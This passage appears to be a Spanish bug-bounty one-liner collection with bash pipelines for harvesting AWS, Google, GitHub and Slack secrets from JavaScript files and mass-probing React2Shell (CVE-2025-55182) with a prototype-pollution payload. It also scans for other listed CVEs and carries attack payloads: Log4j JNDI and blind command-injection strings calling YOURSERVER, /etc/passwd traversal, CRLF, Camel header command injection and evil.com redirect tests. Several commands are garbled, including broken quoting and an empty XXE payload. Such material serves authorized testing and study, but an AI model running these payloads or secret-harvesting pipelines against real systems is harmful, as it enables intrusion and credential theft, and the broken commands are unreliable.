Descubre todos los archivos JS con Katana, filtra por tamaño (>500 bytes), descarga para análisis sin conexión

⚡ 2. Extraer todos los endpoints de API de los archivos JS```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '"'"'"'['"'"'"]' | sed 's/["'"'"']//g' | sort -u | grep -E "^/" | grep -vE ".(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

root@kitploit:~
> Extrae todas las rutas de API relativas de JavaScript, filtra activos estáticos

#### ⚡ 3. Buscador de Claves AWS en Archivos JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Busca IDs de clave de acceso de AWS (patrones AKIA, ABIA, ACCA, ASIA)

⚡ 4. Extractor de Claves de API de Google + URLs de Firebase```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+.firebaseio.com|[a-z0-9-]+.firebaseapp.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

root@kitploit:~
> Extrae claves de API de Google y URLs de base de datos/aplicación de Firebase

#### ⚡ 5. Descubrimiento de S3 Buckets en JavaScript```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Encuentra buckets de S3 en JS y valida la accesibilidad

⚡ 6. Filtración de direcciones IP internas```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.(1[6-9]|2[0-9]|3[01]).[0-9]{1,3}.[0-9]{1,3}|192.168.[0-9]{1,3}.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

root@kitploit:~
> Descubre direcciones IP internas/privadas filtradas en JavaScript (10.x, 172.16-31.x, 192.168.x)

#### ⚡ 7. Slack Webhooks + Discord Tokens en JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extrae URLs de webhooks de Slack y tokens de bots de Discord

⚡ 8. Detección de Tokens de GitHub + Claves Privadas```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

root@kitploit:~
> Encuentra tokens de acceso personal de GitHub (todos los formatos) y encabezados de clave privada

#### ⚡ 9. Direcciones de correo electrónico + Subdominios ocultos en JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extrae direcciones de correo electrónico y subdominios ocultos referenciados en JavaScript

⚡ 10. Pipeline Completo de Reconocimiento JS (Todo-en-Uno)```bash

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE ".js(?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

root@kitploit:~
> Pipeline completo de recon de JS: descubre archivos JS, descarga todos, extrae claves de AWS/Google/GitHub y endpoints de API

> **🎯 Pro Tip:** Usa `nuclei -t exposures/tokens/` en los secretos descubiertos para validar si están activos.

---

## 🆕 Oneliners 2024-2025

### ⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

> **💀 RCE Crítico en React Server Components y Next.js - Bajo explotación activa - Añadido a CISA KEV 💀**

#### ⚡ Detecta apps Next.js (Recon primero)```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Verificar si Next-Action Header es Aceptado```bash

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

root@kitploit:~
#### ⚡ Detección Masiva - Next-Action Header Aceptado```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Crear archivos de payload para pruebas```bash

Create payload.json (safe math check - no RCE)

echo '{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B0"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

root@kitploit:~
#### ⚡ Verificación manual de vulnerabilidades con cURL```bash
curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ Línea única: Pipeline completo de detección```bash

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

root@kitploit:~
#### ⚡ Detectar Cabeceras de Respuesta Vulnerables```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Escaneo masivo con httpx + Next-Action Probe```bash

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

root@kitploit:~
#### ⚡ Dork de Shodan para objetivos Next.js```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Verificación de plantilla de Nuclei```bash

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

root@kitploit:~
#### ⚡ Encuentra y Prueba - One-liner Completo```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Verificar el endpoint RSC directamente```bash

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

root@kitploit:~
#### ⚡ Prueba por lotes desde archivo con paralelismo```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Afectado: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Solución: Actualice a React 19.0.1/19.1.2/19.2.1

🎯 Detección clave: Aplicaciones que aceptan el encabezado Next-Action + deserialización RSC = Posible RCE


🆕 Oneliners de descubrimiento de CVEs de Febrero 2026

🔍 Oneliners centrados en reconocimiento para detectar vulnerabilidades críticas de Febrero 2026

⚠️ Nota: Algunos oneliners hacen referencia a rutas de nuclei-templates que pueden no existir aún en su copia local. Ejecute nuclei -update-templates primero y verifique que la plantilla exista (ls ~/nuclei-templates/...) antes de ejecutar. Confirme siempre los detalles del CVE contra el aviso oficial y manténgase dentro de su ámbito autorizado.

⚡ Cisco Catalyst SD-WAN - Descubrimiento de CVE-2026-20127

Vulnerabilidad crítica (CVSS 10.0) que permite la omisión de autenticación en Cisco SD-WAN Manager/Controller. Explotada desde 2023 por actores de amenazas avanzados. Detectar instancias vulnerables es crucial para proteger infraestructura crítica.

1. Descubrir Cisco SD-WAN Manager/vManage expuesto a través de Shodan```bash

shodan search "title:"Cisco vManage" port:8443,443" --fields ip_str,port,org,isp,asn --separator " | " | tee cisco-sdwan-targets.txt

root@kitploit:~
---

### ⚡ Microsoft Azure Functions - CVE-2026-21532 Descubrimiento

> **Vulnerabilidad de divulgación de información (CVSS 8.2) en Azure Functions que permite la exposición de credenciales y configuraciones sensibles sin autenticación. Identificar endpoints vulnerables es esencial para prevenir la filtración de secretos.**

#### 1. Enumerar los endpoints de Azure Functions con nuclei```bash
cat domains.txt | httpx -silent | nuclei -t ~/nuclei-templates/http/exposures/apis/azure-function-key.yaml -t ~/nuclei-templates/http/exposures/tokens/ -o azure-functions-exposed.txt

⚡ Gradio Framework - CVE-2026-28414 Descubrimiento de Path Traversal

Path traversal crítico (CVSS 7.5) en Gradio <6.7 ejecutándose en Windows con Python 3.13+. Permite lectura arbitraria de archivos. Detectar versiones vulnerables es vital para proteger aplicaciones de ML/AI.

1. Identificar aplicaciones Gradio vulnerables y detectar la versión```bash

echo "https://target.com" | httpx -silent -tech-detect -json | jq -r 'select(.technologies[]? | select(.name=="Gradio")) | "(.url) - (.technologies[] | select(.name=="Gradio").version // "unknown")"'

root@kitploit:~
### ⚡ Gradio Framework - Descubrimiento de SSRF CVE-2026-28416

> **SSRF de alta gravedad (CVSS 8.2) en Gradio <6.6.0 que permite acceso a servicios de metadatos en la nube (AWS/GCP/Azure). Crucial para evitar el compromiso de credenciales en la nube.**

#### 1. Descubrir instancias de Gradio mediante Google Dorks y fingerprinting```bash
echo "inurl:/gradio/ OR intitle:\"Gradio\"" | gau --subs --threads 10 | httpx -silent -status-code -title -tech-detect | grep -i gradio | tee gradio-instances.txt

⚡ Fortinet FortiOS - CVE-2026-25815 Descubrimiento de Credenciales LDAP

Vulnerabilidad de divulgación de credenciales LDAP en FortiOS ≤7.6.6 debido a una clave de cifrado predeterminada débil. Explotada activamente desde diciembre de 2025. Detectar versiones vulnerables es crítico.

1. Identificar FortiGate/FortiOS vulnerables mediante Shodan con versión```bash

shodan search "product:FortiOS" --fields ip_str,version,port,org --separator " | " | awk -F'|' '$2 ~ /^[1-6].|7.[0-5].|7.6.[0-6]/ {print $1 " | Version:" $2 " | " $4}' | tee fortios-vulnerable.txt

root@kitploit:~
---

### ⚡ Dell RecoverPoint for VMs - Descubrimiento de CVE-2026-22769

> **Credenciales codificadas críticas (CVSS 10.0) en Dell RecoverPoint <6.0.3.1 HF1. Permite acceso root remoto. Explotado por grupos APT chinos desde 2024. Se requiere detección urgente.**

#### 1. Detectar Dell RecoverPoint expuesto e identificar Tomcat Manager```bash
shodan search "title:\"RecoverPoint\" http.favicon.hash:-1153767654" --fields ip_str,port,http.title,version --separator " | " | anew dell-recoverpoint-targets.txt

⚡ Windows Shell - CVE-2026-21510 Descubrimiento de Bypass de Seguridad

Bypass de SmartScreen/Mark-of-the-Web (CVSS 8.8) en Windows 10/11. Permite la ejecución de código mediante enlaces/accesos directos maliciosos. Vulnerabilidad de día cero explotada activamente. Es esencial identificar sistemas vulnerables.

1. Identificar endpoints de Windows expuestos y versiones vulnerables vía SMB```bash

nmap -p445 --script smb-os-discovery,smb-protocols --open -iL targets.txt -oG - | grep "Windows 10|Windows 11" | awk '{print $2}' | tee windows-vulnerable-hosts.txt

root@kitploit:~
---

### ⚡ Statamic CMS - Descubrimiento de XSS CVE-2026-28426

> **XSS almacenado crítico (CVSS 8.7) en Statamic <5.73.11 y <6.4.0 mediante plantillas SVG/PDF y Antlers. Permite escalada de privilegios. La detección de versiones vulnerables protege los paneles de control.**

#### 1. Descubrir sitios Statamic y extraer la versión del CMS```bash
echo "Powered by Statamic" | gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico | httpx -silent -tech-detect -status-code | grep -i statamic | nuclei -t ~/nuclei-templates/technologies/statamic-detect.yaml -o statamic-sites.txt

⚡ Chartbrew - CVE-2026-27005 Descubrimiento de Inyección SQL

Inyección SQL crítica no autenticada (CVSS 9.8) en Chartbrew <4.8.3. Permite la lectura/modificación de datos en MySQL/PostgreSQL conectados. Es urgente detectar instancias vulnerables.

1. Identificar instancias expuestas de Chartbrew y comprobar la versión mediante la API```bash

cat web-apps.txt | httpx -silent -path /api/health -mc 200 -json | jq -r 'select(.body | contains("chartbrew")) | "(.url) - Version: (.body | fromjson | .version // "unknown")"' | tee chartbrew-instances.txt

root@kitploit:~
---

### ⚡ Chartbrew - CVE-2026-25887: Detección de RCE en MongoDB

> **RCE mediante inyección de consultas MongoDB (CVSS 7.2) en Chartbrew <4.8.1. Permite la ejecución arbitraria de JavaScript en el servidor MongoDB. Crucial para detectar instancias vulnerables antes de la explotación.**

#### 1. Enumerar los endpoints de Chartbrew mientras se escanea en busca de APIs vulnerables```bash
subfinder -d target.com -silent | httpx -silent | gau --subs | grep -E "chartbrew|/api/.*chart|/api/.*connection" | httpx -silent -status-code -title -tech-detect | grep -i "chartbrew\|mongo" | anew chartbrew-mongodb-endpoints.txt

⚡ Apache Camel - CVE-2026-31650 Descubrimiento de Inyección de Cabeceras

Inyección crítica de cabeceras (CVSS 9.1) en Apache Camel <4.9.2 que permite la evasión de filtros mediante manipulación de cabeceras HTTP (CamelExec*). Detectar endpoints Camel expuestos protege las tuberías de integración empresarial.

1. Descubrir endpoints de Apache Camel y probar la evasión de inyección de cabeceras```bash

cat urls.txt | httpx -silent -H "CamelExecCommandExecutable: id" -H "CamelExecCommandArgs: -la" -mc 200 -match-string "uid=" | anew camel-header-injection.txt

root@kitploit:~
---

### ⚡ Jenkins CI - CVE-2026-30170 Descubrimiento de RCE en la Consola de Scripts

> **RCE a través de la Consola de Scripts (CVSS 9.8) en Jenkins <2.503 con autenticación débil o anónima habilitada. Permite la ejecución arbitraria de Groovy. Es urgente identificar las instancias expuestas para proteger el CI/CD.**

#### 1. Identificar Jenkins expuesto y verificar si la Consola de Scripts es accesible```bash
subfinder -d target.com -silent | httpx -silent -path /script -mc 200 -title -match-string "Script Console" | anew jenkins-script-console-exposed.txt

⚡ Introspección de GraphQL - CVE-2026-29812 Descubrimiento de Fuga de Esquema

Divulgación de información (CVSS 7.5) mediante introspección dejada habilitada en producción. Permite el mapeo completo del esquema, mutaciones y tipos sensibles. Detectar endpoints con introspección abierta acelera el mapeo de la superficie de ataque.

1. Descubrir endpoints de GraphQL y detectar introspección habilitada```bash

cat urls.txt | grep -Ei "graphql|/api" | httpx -silent -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' -mc 200 -match-string "__schema" | anew graphql-introspection-open.txt

root@kitploit:~
---

### ⚡ Ollama AI - CVE-2026-32154 Descubrimiento de path traversal en modelos

> **Path traversal (CVSS 8.6) en Ollama <0.5.9 a través de la API `/api/pull` que permite escritura arbitraria de archivos mediante nombres de modelos maliciosos. Detectar instancias expuestas de Ollama protege la infraestructura local de IA.**

#### 1. Identificar servidores Ollama expuestos y enumerar modelos cargados```bash
shodan search "product:Ollama port:11434" --fields ip_str,port,org --separator " | " | awk -F'|' '{print "http://"$1":11434/api/tags"}' | httpx -silent -mc 200 -json | jq -r '.url + " | " + (.body // "")' | anew ollama-exposed-instances.txt

⚡ Spring Boot Actuator - CVE-2026-33001 Descubrimiento de Exposición del Endpoint Env

Exposición de secretos (CVSS 8.2) a través de un endpoint desprotegido /actuator/env en Spring Boot. Filtra credenciales de base de datos, tokens y claves API. La detección masiva de actuators abiertos es fundamental para prevenir fugas.

1. Descubrir endpoints expuestos de Spring Actuator y extraer variables sensibles```bash

cat hosts.txt | httpx -silent -path /actuator/env -mc 200 -json | jq -r 'select(.body | test("password|secret|token|key";"i")) | .url' | anew spring-actuator-env-leak.txt

root@kitploit:~
### Nuclei DAST XSS```bash
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Masiva```bash

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

root@kitploit:~
### Configuración incorrecta de CORS```bash
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Inyección de encabezado de host```bash

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

root@kitploit:~
### CRLF Injection```bash
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution```bash

cat js.txt | xargs -I@ curl -s @ | grep -E "(proto|constructor.prototype)" | anew proto_pollution.txt

root@kitploit:~
### Detección de Cache Poisoning```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

Detección de patrones IDOR```bash

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

root@kitploit:~
### Condición de Carrera URLs```bash
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

Puntos finales de WebSocket```bash

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

root@kitploit:~
### Recorrido de rutas```bash
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

Detección de XXE```bash

cat urls.txt | grep -iE ".(xml|soap)" | qsreplace ']>&xxe;'

root@kitploit:~
### Log4j Escaneo```bash
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Inyección ciega de comandos```bash

cat urls.txt | qsreplace "`curl YOURSERVER`" | httpx -silent cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

root@kitploit:~
### Captura masiva de pantalla```bash
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Detección de Tecnología```bash

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

root@kitploit:~
### Favicon Hash (Shodan)```bash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Paneles de Administración Expuestos```bash

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

root@kitploit:~
### Endpoints de depuración```bash
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators```bash

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

root@kitploit:~
### Enumeración de WordPress```bash
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode```bash

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

root@kitploit:~
### Depuración de Django```bash
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling```bash

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

root@kitploit:~
### Comprobación de bypass de CSP```bash
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdominio desde Favicon```bash

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

root@kitploit:~
---

## 🔍 Motores de búsqueda para hackers

| Engine | Link | Description |
|:------:|:----:|:-----------:|
| **Shodan** | [shodan.io](https://shodan.io) | Búsqueda de IoT y dispositivos |
| **Censys** | [censys.io](https://censys.io) | Datos de escaneo de internet |
| **Fofa** | [fofa.info](https://en.fofa.info) | Búsqueda en el ciberespacio |
| **ZoomEye** | [zoomeye.org](https://zoomeye.org) | Mapeo del ciberespacio |
| **Hunter** | [hunter.how](https://hunter.how) | Descubrimiento de activos |
| **Netlas** | [netlas.io](https://netlas.io) | Superficie de ataque |
| **GreyNoise** | [greynoise.io](https://viz.greynoise.io) | Escáneres de internet |
| **Onyphe** | [onyphe.io](https://onyphe.io) | Defensa cibernética |
| **CriminalIP** | [criminalip.io](https://criminalip.io) | Inteligencia de amenazas |
| **FullHunt** | [fullhunt.io](https://fullhunt.io) | Superficie de ataque |
| **Quake** | [quake.360.net](https://quake.360.net) | Búsqueda en el ciberespacio |
| **Leakix** | [leakix.net](https://leakix.net) | Detección de fugas |
| **URLScan** | [urlscan.io](https://urlscan.io) | Análisis de URL |
| **DNSDumpster** | [dnsdumpster.com](https://dnsdumpster.com) | Reconocimiento DNS |
| **crt.sh** | [crt.sh](https://crt.sh) | Búsqueda de certificados |
| **SecurityTrails** | [securitytrails.com](https://securitytrails.com) | Historial DNS |
| **Pulsedive** | [pulsedive.com](https://pulsedive.com) | Inteligencia de amenazas |
| **VirusTotal** | [virustotal.com](https://virustotal.com) | Análisis de archivos/URL |
| **PublicWWW** | [publicwww.com](https://publicwww.com) | Búsqueda de código fuente |
| **Grep.app** | [grep.app](https://grep.app) | Búsqueda de código en GitHub |

---

## 📖 Listas de palabras recomendadas

| Wordlist | Link | Use Case |
|:---------|:----:|:---------|
| **SecLists** | [GitHub](https://github.com/danielmiessler/SecLists) | Todo |
| **FuzzDB** | [GitHub](https://github.com/fuzzdb-project/fuzzdb) | Fuzzing |
| **Assetnote** | [wordlists.assetnote.io](https://wordlists.assetnote.io) | Contenido web |
| **OneListForAll** | [GitHub](https://github.com/six2dez/OneListForAll) | Combinado |
| **jhaddix all.txt** | [GitHub](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) | Directorios |
| **commonspeak2** | [GitHub](https://github.com/assetnote/commonspeak2-wordlists) | Mundo real |

---

## 📚 Recursos de aprendizaje

### Libros
- Web Application Hacker's Handbook
- Real-World Bug Hunting por Peter Yaworski
- Bug Bounty Bootcamp por Vickie Li

### Plataformas
- [HackerOne](https://hackerone.com)
- [Bugcrowd](https://bugcrowd.com)
- [Intigriti](https://intigriti.com)
- [YesWeHack](https://yeswehack.com)

### Práctica
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [PentesterLab](https://pentesterlab.com)
- [HackTheBox](https://hackthebox.com)
- [TryHackMe](https://tryhackme.com)

### Blogs y recursos
- [PortSwigger Research](https://portswigger.net/research)
- [ProjectDiscovery Blog](https://blog.projectdiscovery.io)
- [Assetnote Blog](https://blog.assetnote.io)

---

## 🙏 Agradecimientos especiales

<div align="center">

| Hunter | Hunter | Hunter |
|:------:|:------:|:------:|
| [@bt0s3c](https://twitter.com/bt0s3c) | [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) | [@stokfredrik](https://twitter.com/stokfredrik) |
| [@Jhaddix](https://twitter.com/Jhaddix) | [@TomNomNom](https://twitter.com/TomNomNom) | [@NahamSec](https://twitter.com/NahamSec) |
| [@zseano](https://twitter.com/zseano) | [@pry0cc](https://twitter.com/pry0cc) | [@pdiscoveryio](https://twitter.com/pdiscoveryio) |
| [@jeff_foley](https://twitter.com/jeff_foley) | [@haaborern](https://twitter.com/haaborern) | [@0xacb](https://twitter.com/0xacb) |

</div>

---

## 🤝 Contribuciones

<div align="center">

¡Damos la bienvenida a las contribuciones de la comunidad! Tu experiencia hace que este repositorio sea mejor.

[![Contributors](https://img.shields.io/github/contributors/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=blue)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/graphs/contributors)
[![Pull Requests](https://img.shields.io/github/issues-pr/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=green)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/pulls)
[![Issues](https://img.shields.io/github/issues/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=orange)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/issues)

</div>

### 💡 Cómo contribuir

<details>
<summary><b>📝 Haz clic para ver las pautas de contribución</b></summary>

<br>

1. **Hacer fork del repositorio**   ```bash
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
  1. Crear una nueva rama ```bash git checkout -b feature/your-contribution

    root@kitploit:~
  2. Agrega tu contenido

    • Añade nuevos one-liners con documentación adecuada
    • Incluye referencias de fuentes y explicaciones
    • Sigue el formato y la estructura existentes
  3. Envía una Pull Request

    • Escribe una descripción clara de tus cambios
    • Haz referencia a cualquier issue relacionado
    • Espera la revisión y comentarios

✨ ¿Qué contribuir?

  • 🎯 Nuevos one-liners y técnicas para bug bounty
  • 🔧 Guías y consejos de instalación de herramientas
  • 📚 Recursos y referencias adicionales
  • 🐛 Corrección de errores y mejoras
  • 📖 Mejoras en la documentación
  • 🌐 Traducciones a otros idiomas
Stars
Estrellas
Forks
Forks
Watchers
Observadores
Contributors
Contribuyentes

📈 Gráfico de Crecimiento

Star History Chart

RecursoEnlace
🏠 Página principalKing of Bug Bounty Tips
🛠️ KingRecon DODHerramienta de reconocimiento automatizado
🐧 BugBuntu OSDescargar aquí
📺 Canal de YouTubeOFJAAAH
💬 Grupo de TelegramUnirse a la comunidad
🐦 Twitter/X@ofjaaah
💼 LinkedInConectar
🐛 Reportar problemasIssues de GitHub
🔐 Problemas de seguridadAviso de seguridad